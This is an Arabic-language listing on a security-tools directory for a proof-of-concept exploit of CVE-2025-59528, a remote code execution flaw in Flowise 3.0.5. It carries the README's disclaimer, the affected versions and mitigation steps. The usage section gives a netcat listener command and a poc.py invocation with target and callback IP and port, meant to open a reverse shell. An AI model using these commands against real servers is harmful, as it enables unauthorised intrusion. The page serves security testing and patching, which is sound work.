Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sonnelon/cve-2025-59528-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

The poc of CVE-2025-59528

عرض المستودع
منذ 10 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59528 إثبات المفهوم

إثبات المفهوم (PoC) لدراسة CVE-2025-59528 في بيئة مختبرية معزولة.

[!WARNING] إخلاء المسؤولية

هذا المشروع مخصص حصريًا للأغراض التعليمية، والبحث الأمني، واختبار الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

لا تستخدم إثبات المفهوم هذا ضد خوادم تابعة لجهات خارجية، أو خدمات عامة، أو بنية تحتية دون إذن المالك.

ليس المؤلف مسؤولًا عن أي ضرر، أو فقدان بيانات، أو انقطاع خدمة، أو عواقب قانونية ناتجة عن إساءة استخدام هذا المشروع.

الوصف

يوضح إثبات المفهوم هذا التأثير المحتمل للثغرة CVE-2025-59528، وهي ثغرة تتعلق بمعالجة mcpServerConfig الذي يتحكم فيه المستخدم في Flowise.

في ظل ظروف معينة، قد تسمح الثغرة للمهاجم بتنفيذ كود JavaScript عشوائي على جانب الخادم.

الإصدارات المتأثرة

  • Flowise 3.0.5

الإصدار المُصلَح

  • Flowise 3.0.6+

تحقق دائمًا من الإصدار الدقيق للتثبيت المستهدف قبل الاختبار.

المتطلبات

  • Python 3
  • requests
  • نسخة اختبار محلية أو معزولة من Flowise
  • حساب مصرح به بالصلاحيات المطلوبة

ثبّت تبعية Python:

root@kitploit:~
pip install requests

الاستخدام

شغّل netcat للحصول على شل:

root@kitploit:~
nc -lvnp <YOUR_PORT>

شغّل إثبات المفهوم باستخدام:

root@kitploit:~
python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

الوسائط

إعداد المختبر

يجب إجراء الاختبار داخل شبكة افتراضية أو مختبرية معزولة.

root@kitploit:~
┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

لا تقم بتعريض نسخة Flowise المعرّضة للثغرة عمدًا للإنترنت العام مباشرة.

التخفيف

إذا كنت تشغّل إصدارًا متأثرًا من Flowise:

  1. قم بترقية Flowise إلى إصدار مُصَلَح.
  2. قيّد الوصول إلى واجهات برمجة التطبيقات (APIs) الإدارية.
  3. تجنّب منح المستخدمين غير الموثوقين الصلاحيات المطلوبة للوصول إلى الوظائف المعرّضة للثغرة.
  4. راجع سجلات الخادم بحثًا عن طلبات مشبوهة.
  5. أعد اختبار التثبيت بعد الترقية.

المراجع

  • CVE: CVE-2025-59528
  • البرنامج المتأثر: Flowise
  • الإصدار المُصلَح: 3.0.6+

إشعار قانوني

باستخدامك لهذا المشروع، فإنك تقرّ بأنك المسؤول الوحيد عن الامتثال لجميع القوانين واللوائح المعمول بها.

استخدم إثبات المفهوم هذا فقط ضد الأنظمة التي تملكها أو الأنظمة التي لديك إذن صريح لإجراء اختبارات أمنية عليها.

تنزيل الأداة
الوسيطالوصف
-t, --targetعنوان URL لنسخة اختبار Flowise
-o, --api_keyمفتاح API
-i, --ipعنوان IP لجهاز الاختبار
-p, --portالمنفذ المستخدم في بيئة الاختبار